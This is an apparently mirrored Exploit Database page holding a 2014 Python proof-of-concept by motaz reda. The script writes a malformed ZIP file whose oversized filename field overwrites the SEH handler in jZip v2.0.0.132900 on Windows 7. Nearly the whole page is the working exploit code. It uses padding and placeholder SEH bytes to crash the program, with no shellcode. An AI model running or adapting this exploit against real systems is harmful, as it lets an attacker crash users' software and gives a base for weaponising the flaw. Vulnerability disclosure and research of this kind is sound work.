Jzip – Buffer Overflow (PoC) (SEH Unicode)

• Exploit Database
• 111 阅读

• 作者： motaz reda
  日期： 2014-04-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32899/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  #!/usr/bin/python ###################################################### # Exploit title: seh unicode buffer overflow (DOS) # Date: 16/04/2014 # Exploit Author: motaz reda [motazkhodair[at]gmail.com] # Software Link : http://www.jzip.com/ # Version: jZip v2.0.0.132900 # Tested On: Windows 7 ultimate ########################################################   import sys, os   filename = "vuln.zip"     buffer = "\x50\x4B\x03\x04\x14\x00\x00" buffer += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\xe4\x0f" buffer += "\x00\x00\x00"   eo = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" eo += "\x12\x10\x00\x00" eo += "\x02\x10\x00\x00" eo += "\x00\x00"   cdf = "\x50\x4B\x01\x02\x14\x00\x14" cdf += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" cdf += "\x00\x00\x00\x00\x00\x00\x00\x00\x00" cdf += "\xe4\x0f" cdf += "\x00\x00\x00\x00\x00\x00\x01\x00" cdf += "\x24\x00\x00\x00\x00\x00\x00\x00"   payload = "A" * 862 payload += "\x42\x42" # NSEH payload += "\x42\x42" # SEH payload += "D" * 3198 payload += ".txt"     file= open(filename, "w")   zipfile = buffer + payload + cdf + payload + eo   file.write(zipfile) file.close()